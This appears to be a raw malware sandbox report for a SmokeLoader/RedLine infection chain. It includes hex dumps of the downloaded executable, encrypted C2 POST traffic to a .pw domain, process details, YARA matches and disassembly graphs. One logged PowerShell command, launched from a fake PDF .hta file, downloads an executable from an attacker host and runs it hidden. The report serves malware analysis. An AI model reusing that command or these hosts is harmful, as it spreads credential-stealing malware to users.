                  Connection: close
                  Last-Modified: Wed, 02 Oct 2024 05:06:08 GMT
                  ETag: "36600-62377654eb000"
                  Accept-Ranges: bytes
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 [TRUNCATED]
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$IBBB\^\Q\euEB2\C\C\CRichBPEL`Ied@DPPX.text~ `.rdata" "@@.data@.tls@@.rsrcP@@
                  Oct 2, 2024 12:25:20.716855049 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 08 c0 41 00 75 02 f3 c3 e9 11 07 00 00 6a 0c 68 90 a4 41 00 e8 05 15 00 00 8b 75 08 85 f6 74
                  Data Ascii: ;AujhAutu=?QuCjYeVYEtVP>YYE}u7ujYVj5AAuhAPYUQeVEPu
                  Oct 2, 2024 12:25:20.716869116 CEST1236INData Raw: ff 75 08 e8 55 16 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 9e 07 00 00 85 c0 74 0a e8 95 07 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 6b 19 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c
                  Data Ascii: uUu9EttM^Ujjuk]UEVFucH&FHlHhN;AtAHpu"F;AtFAHpuWFF@puHpF@F^]U(SVuMdu3;u(SSSSS
                  Oct 2, 2024 12:25:20.717072964 CEST1236INData Raw: ff 75 08 e8 61 2f 00 00 68 ff 00 00 00 e8 27 fd ff ff 59 59 5d c3 6a 58 68 d0 a4 41 00 e8 7b 0f 00 00 33 f6 89 75 fc 8d 45 98 50 ff 15 c0 90 41 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45
                  Data Ascii: ua/h'YY]jXhA{3uEPAj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CSoYujXY~"ujGY1];}j&Y;?Qo;xA:}jYw8}j
                  Oct 2, 2024 12:25:20.717091084 CEST448INData Raw: 5e 5d c3 8b ff 55 8b ec 8b 0d c4 3f 51 00 a1 c8 3f 51 00 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b
                  Data Ascii: ^]U?Q?QkU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZU
                  Oct 2, 2024 12:25:20.717108965 CEST448INData Raw: 5e 5d c3 8b ff 55 8b ec 8b 0d c4 3f 51 00 a1 c8 3f 51 00 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b
                  Data Ascii: ^]U?Q?QkU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZU
                  Oct 2, 2024 12:25:20.877479076 CEST1236INData Raw: 8d 0c d1 8b 59 04 89 4e 08 89 5e 04 89 71 04 8b 4e 04 89 71 08 8b 4e 04 3b 4e 08 75 60 8a 4c 02 04 88 4d 0f fe c1 88 4c 02 04 83 fa 20 73 25 80 7d 0f 00 75 0e 8b ca bb 00 00 00 80 d3 eb 8b 4d 08 09 19 bb 00 00 00 80 8b ca d3 eb 8d 44 b8 44 09 18
                  Data Ascii: YN^qNqN;Nu`LML s%}uMDD)}uJMYJED0EA?Q5Ah@HSQ?QAPA@?QA@H
                  Oct 2, 2024 12:25:20.877532005 CEST224INData Raw: fc 89 44 32 f8 e9 3c 01 00 00 33 c0 e9 38 01 00 00 0f 8d 2f 01 00 00 8b 5d 0c 29 75 10 8d 4e 01 89 4b fc 8d 5c 33 fc 8b 75 10 c1 fe 04 4e 89 5d 0c 89 4b fc 83 fe 3f 76 03 6a 3f 5e f6 45 fc 01 0f 85 80 00 00 00 8b 75 fc c1 fe 04 4e 83 fe 3f 76 03
                  Data Ascii: D2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M!NL!uM!Y]OwqwOquuuN?vj?^MyK{YKYK
                  Oct 2, 2024 12:25:21.403520107 CEST1236INData Raw: 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0 bf 00 00 00 80 d3 ef 8b 4d 08 09 79 04 8d 84 90 c4 00 00 00 8d
                  Data Ascii: ;KuWLML s}uM9DD }uNMyNED3@_^[U?QMk?QMSI VW}M3U?QS;#U#u];r;u?QS;#U#u
                  Oct 2, 2024 12:25:21.403785944 CEST1236INData Raw: 58 0c 74 12 68 08 c0 41 00 57 8b d3 8b c8 e8 e2 33 00 00 8b 45 0c 8b 4d f8 89 48 0c 8b 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 31 e9 ff ff 8b 4e 0c 8b 56 08 03 cf 33 0c 3a e8 21 e9 ff ff 8b 45 f0 8b 48 08 8b d7 e8 75 33 00 00 ba fe ff ff ff
                  Data Ascii: XthAW3EMHtN381NV3:!EHu39SRhAW3jhAM3;v.jX3;E@u3WWWWW3Mu;u3F3]wi=?QuKuE;?Qw7jY}
                  Oct 2, 2024 12:25:21.403804064 CEST1236INData Raw: 0f b6 03 3b c8 77 16 2b c1 40 50 8d 94 0d fc fe ff ff 6a 20 52 e8 23 2f 00 00 83 c4 0c 43 8a 03 43 84 c0 75 d8 6a 00 ff 76 0c 8d 85 fc fa ff ff ff 76 04 50 57 8d 85 fc fe ff ff 50 6a 01 6a 00 e8 11 36 00 00 33 db 53 ff 76 04 8d 85 fc fd ff ff 57
                  Data Ascii: ;w+@Pj R#/CCujvvPWPjj63SvWPWPWvS3DSvWPWPhvS3$3EtLtL @;rV3)


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.2249162185.219.7.204801244C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Oct 2, 2024 12:25:56.252652884 CEST287OUTPOST /index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://navjbpyetuaao.org/
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 275
                  Host: unicexpertmagazine.pw
                  Oct 2, 2024 12:25:56.252680063 CEST275OUTData Raw: a1 5f 7d 2c f5 37 58 cc ca 39 a0 ca 80 c7 59 3d 53 39 ce 58 6b c0 31 57 af 22 c8 6c 7b fd 05 56 b9 51 d4 fd 4a d1 06 3e 59 ce cd 04 b6 49 02 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 4d 8d e0 18 1d ce ca bf 4a 72 43 29 be 81 49 54 cb
                  Data Ascii: _},7X9Y=S9Xk1W"l{VQJ>YI3sk2m-^MJrC)IT?%:[]fn#8OS9?T5z4w<r"\'0<u8b8lQC,V'a]>*@fC3BQ"R:uTIH;TeMk:<r
                  Oct 2, 2024 12:25:57.549443007 CEST602INHTTP/1.1 404 Not Found
                  Server: nginx/1.18.0
                  Date: Wed, 02 Oct 2024 10:25:57 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                  Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  2192.168.2.2249163185.219.7.204801244C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Oct 2, 2024 12:27:08.482836962 CEST287OUTPOST /index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://kwbsyhfpuedti.net/
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 325
                  Host: unicexpertmagazine.pw
                  Oct 2, 2024 12:27:08.482875109 CEST325OUTData Raw: a1 5f 7d 2c f5 37 58 cc ca 39 a0 ca 80 c7 59 3d 53 39 ce 58 6b c0 31 57 af 22 c8 6c 7b fd 05 56 b9 51 d4 fd 4a d1 06 3e 59 ce cd 04 b6 49 02 33 db 73 6b 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 4d 8d e0 18 1d ce ca bf 4a 72 43 29 be 8e 37 37 a2
                  Data Ascii: _},7X9Y=S9Xk1W"l{VQJ>YI3sk2m-^MJrC)77*EPUpD|g A_<7G[8poDlBQ/|>J|ceiTc*3s}]qb:kU@y)yK9\/$W[g;afP(@


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:06:25:05
                  Start date:02/10/2024
                  Path:C:\Windows\SysWOW64\mshta.exe
                  Wow64 process (32bit):true
                  Commandline:mshta.exe "C:\Users\user\Desktop\3388.PDF.hta"
                  Imagebase:0x890000
                  File size:13'312 bytes
                  MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:1
                  Start time:06:25:06
                  Start date:02/10/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
                  Imagebase:0x12a0000
                  File size:427'008 bytes
                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:06:25:24
                  Start date:02/10/2024
                  Path:C:\Users\user\AppData\Local\Temp\EkXH.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\EkXH.exe"
                  Imagebase:0x400000
                  File size:222'720 bytes
                  MD5 hash:31059E7394B880F017E83804D9B716AB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.406593052.0000000000251000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.406664461.0000000000669000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.406577078.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.406582889.0000000000230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 36%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Target ID:5
                  Start time:06:25:33
                  Start date:02/10/2024
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0xff2f0000
                  File size:3'229'696 bytes
                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:7
                  Start time:06:25:55
                  Start date:02/10/2024
                  Path:C:\Windows\System32\taskeng.exe
                  Wow64 process (32bit):false
                  Commandline:taskeng.exe {A18241FA-0367-40E9-BBC3-15CE4DAD052A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                  Imagebase:0xff6a0000
                  File size:464'384 bytes
                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:8
                  Start time:06:25:55
                  Start date:02/10/2024
                  Path:C:\Users\user\AppData\Roaming\vgjfftu
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\vgjfftu
                  Imagebase:0x400000
                  File size:222'720 bytes
                  MD5 hash:31059E7394B880F017E83804D9B716AB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.472086421.0000000000220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.476562400.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.475270997.0000000000230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 36%, Virustotal, Browse
                  Reputation:low
                  Has exited:true

                  Reset < >
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @#$d$@#$d
                    • API String ID: 0-3382464376
                    • Opcode ID: e39e9212c2fac1925d7003e02bf782b075eb87f6da5028cc2366947b5e9a53d1
                    • Instruction ID: c44c69d6b7988547f97543ff21f6966091b6a253d020a078e07cdfb2fd8b8bfb
                    • Opcode Fuzzy Hash: e39e9212c2fac1925d7003e02bf782b075eb87f6da5028cc2366947b5e9a53d1
                    • Instruction Fuzzy Hash: 3861E338704204DFDB659F64C854BAB7BE1AB81310F14846FE505DB392DB39DD82C796
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @#$d
                    • API String ID: 0-996948863
                    • Opcode ID: bec4a812e1180674b2c3025e6b273da6af8822f5772a0a58b7ac101078ac2bf8
                    • Instruction ID: b4dc002ec0bbb4d526bc7f1ebdad378d896234525ffaa16740d93507eaec90ea
                    • Opcode Fuzzy Hash: bec4a812e1180674b2c3025e6b273da6af8822f5772a0a58b7ac101078ac2bf8
                    • Instruction Fuzzy Hash: 1A41BC38604349DFDBA88F64C454FAA7BB1AF41310F1480AFE849DB292D778DD85CB66
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @#$d
                    • API String ID: 0-996948863
                    • Opcode ID: 0749b9917ba27bf6d8f2b1d70b2e67351483b6a63d0fe51ed4fea3e6ad9d3931
                    • Instruction ID: d0e6229cd28a7e6ae2aa32126154041b3398f9ad3abefb569ea5598d78451e26
                    • Opcode Fuzzy Hash: 0749b9917ba27bf6d8f2b1d70b2e67351483b6a63d0fe51ed4fea3e6ad9d3931
                    • Instruction Fuzzy Hash: 4D316D38600209DFDBA88F64C544FBB7BE1AB40350F14856EE80AAB291D779ED81DB55
                    Memory Dump Source
                    • Source File: 00000001.00000002.390276805.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_19d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9949015c9d79ec2dce5859fcafa6bd5e292fae1efdf1fcc963361699957a7ee7
                    • Instruction ID: 6bc0abae46159e763daa03df7bc7e8a3e1eba03d8cb63b5f28ab347f28b88f50
                    • Opcode Fuzzy Hash: 9949015c9d79ec2dce5859fcafa6bd5e292fae1efdf1fcc963361699957a7ee7
                    • Instruction Fuzzy Hash: 7701A771504740AEEB144A15DC84767BB98EF81764F1CC555FC490B282C3799945CAB1
                    Memory Dump Source
                    • Source File: 00000001.00000002.390276805.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_19d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7a7b455dd8b8bc89f292f99b18a19695d1d3534a277c033e5200eff58d4fc76
                    • Instruction ID: 61540abf479576fc40f685270a500172b27cdedfbaf506b0bb1abd5981bb35d9
                    • Opcode Fuzzy Hash: f7a7b455dd8b8bc89f292f99b18a19695d1d3534a277c033e5200eff58d4fc76
                    • Instruction Fuzzy Hash: 37F0C271504240AFEB108A15DCC4B66FBE8EB41724F18C15AFC480F282C3799C45CAB1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @#$d$@#$d$L4#p$L4#p$L4#p$T:6$T:6$T:6
                    • API String ID: 0-384844843
                    • Opcode ID: 151406b537882caa6ccd96e92ae5f53a9e2056e149801f52577335ff4022a0f3
                    • Instruction ID: 07ab1112572c2a718bc828ade4f3d35ad8340c5c910b9b28b85fe2d84313754d
                    • Opcode Fuzzy Hash: 151406b537882caa6ccd96e92ae5f53a9e2056e149801f52577335ff4022a0f3
                    • Instruction Fuzzy Hash: CF611935704244DFDB599B64C850BBF77A2AF80310F14807BEA059B391DB78DD45CB9A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0:6$0:6$0:6$@#$d$@#$d$L4#p$L4#p$L4#p
                    • API String ID: 0-48357444
                    • Opcode ID: 184a83bbe3c7896c6c07789ddf2ac999985c14f8310e8116ed0131af0b0c250e
                    • Instruction ID: 9804f0aad0a200485c85e872b3d98d4ab05093b0a351cf64c7266ad52190d757
                    • Opcode Fuzzy Hash: 184a83bbe3c7896c6c07789ddf2ac999985c14f8310e8116ed0131af0b0c250e
                    • Instruction Fuzzy Hash: B751F339B00248DFDB559E65C804BAFB7A2AF85310F18806BA9459B391CB75CE41CB96
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: ,;6$@#$d$@#$d$L4#p$L4#p$L4#p
                    • API String ID: 0-198401197
                    • Opcode ID: 37d0af00016857c2e294387836a6be16aec1e0b45cf04e37f1971dedc699fa3d
                    • Instruction ID: 018cfbe57bfe7440d0ac2f6a2685e51921e7c24b58a0801441901e497fd2e92e
                    • Opcode Fuzzy Hash: 37d0af00016857c2e294387836a6be16aec1e0b45cf04e37f1971dedc699fa3d
                    • Instruction Fuzzy Hash: D2612638700358DFDB559B64C804BBF7BA2AF85310F14806EE905AB392DB75CE41C7A6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @#$d$@#$d$L4#p$L4#p$L4#p
                    • API String ID: 0-3622070961
                    • Opcode ID: f58f7d12ca302e91d0bc1a6e76ce35f920afd8846a1d2fdda5560c1892851d22
                    • Instruction ID: 7b583189b8004f4f1228f08a371533a600dcdd6556af1574ae0c516dffd9abf1
                    • Opcode Fuzzy Hash: f58f7d12ca302e91d0bc1a6e76ce35f920afd8846a1d2fdda5560c1892851d22
                    • Instruction Fuzzy Hash: 45512739B002459FDB558E25C400BBFB7A6AF86310F24806EEA059B3A3DF79DD81C756
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.390815222.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4c0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: @#$d$L4#p$L4#p$L4#p
                    • API String ID: 0-219050221
                    • Opcode ID: 7a9c1f5096db5820ea701f0c2337c60bdb3aa24c0b4afb6a66dac2f9d781e80c
                    • Instruction ID: 217e053847ab7486c296e908762f402550e113732f9fb9b9b94e93cfae19d77a
                    • Opcode Fuzzy Hash: 7a9c1f5096db5820ea701f0c2337c60bdb3aa24c0b4afb6a66dac2f9d781e80c
                    • Instruction Fuzzy Hash: A841D279A00348EFEF659E14C440FBF7BA5AF44310F18806AE9046B392C779DD85CBA6

                    Execution Graph

                    Execution Coverage:8.6%
                    Dynamic/Decrypted Code Coverage:18.2%
                    Signature Coverage:48.8%
                    Total number of Nodes:170
                    Total number of Limit Nodes:6
                    execution_graph 3968 66bb66 3969 66bb6a 3968->3969 3972 66bbaf 3968->3972 3973 66bb77 3969->3973 3974 66bb86 3973->3974 3977 66c317 3974->3977 3980 66c332 3977->3980 3978 66c33b CreateToolhelp32Snapshot 3979 66c357 Module32First 3978->3979 3978->3980 3981 66c366 3979->3981 3982 66bb76 3979->3982 3980->3978 3980->3979 3984 66bfd6 3981->3984 3985 66c001 3984->3985 3986 66c012 VirtualAlloc 3985->3986 3987 66c04a 3985->3987 3986->3987 4096 402e42 4099 402e47 4096->4099 4097 402f18 4098 401902 8 API calls 4097->4098 4100 402f4c 4097->4100 4098->4100 4099->4097 4099->4100 4101 4020ea NtQuerySystemInformation 4099->4101 4101->4097 4178 401747 4179 401755 4178->4179 4181 4017e2 4179->4181 4182 40180d 4181->4182 4185 40332a 4182->4185 4184 401841 4184->4179 4186 403309 4185->4186 4186->4185 4187 403321 Sleep 4186->4187 4188 403311 4186->4188 4190 4032bd 4186->4190 4187->4186 4189 403375 NtQueryInformationProcess 4188->4189 4188->4190 4189->4190 4190->4184 4292 418986 4294 418990 4292->4294 4293 418940 SetPriorityClass 4293->4294 4294->4293 4295 4189ad 4294->4295 4191 22092b GetPEB 4192 220972 4191->4192 4238 40190e 4239 401912 4238->4239 4240 4018b5 4238->4240 4241 401946 Sleep 4239->4241 4242 401961 4241->4242 4243 401529 7 API calls 4242->4243 4244 401972 4242->4244 4243->4244 4193 401750 4194 40174b 4193->4194 4195 4017e2 2 API calls 4194->4195 4195->4194 3988 418ed0 3991 418a70 3988->3991 3990 418ed5 3992 418a7d 3991->3992 3993 418b80 7 API calls 3992->3993 3994 418cc6 3992->3994 3996 418bf8 7 API calls 3993->3996 3995 418cd4 SetCommState 3994->3995 3999 418ced 3994->3999 3995->3994 3997 418ca4 3996->3997 3998 418c98 ObjectPrivilegeAuditAlarmW 3996->3998 4000 418cb5 3997->4000 4001 418cad WaitForSingleObject 3997->4001 3998->3997 4002 418daa 3999->4002 4003 418cfa 9 API calls 3999->4003 4000->3994 4001->4000 4015 418740 LocalAlloc 4002->4015 4010 418d88 4003->4010 4007 418daf LoadLibraryA 4016 418770 GetModuleHandleW GetProcAddress VirtualProtect 4007->4016 4008 418dfd 4017 4189d0 4008->4017 4010->4002 4011 418e02 4012 418e43 InterlockedCompareExchange 4011->4012 4013 418e23 MoveFileW 4011->4013 4014 418e5d 4011->4014 4012->4011 4013->4011 4014->3990 4015->4007 4016->4008 4018 4189f9 QueryDosDeviceW 4017->4018 4019 418a0a 4017->4019 4018->4019 4028 418910 4019->4028 4022 418a25 4031 418950 4022->4031 4023 418a1d FreeEnvironmentStringsA 4023->4022 4026 418a57 4026->4011 4027 418a3c HeapCreate GetNumaProcessorNode 4027->4026 4029 418921 FatalAppExitA GetModuleHandleA 4028->4029 4030 418933 4028->4030 4029->4030 4030->4022 4030->4023 4032 41896c 4031->4032 4033 41895e BuildCommDCBA 4031->4033 4034 418974 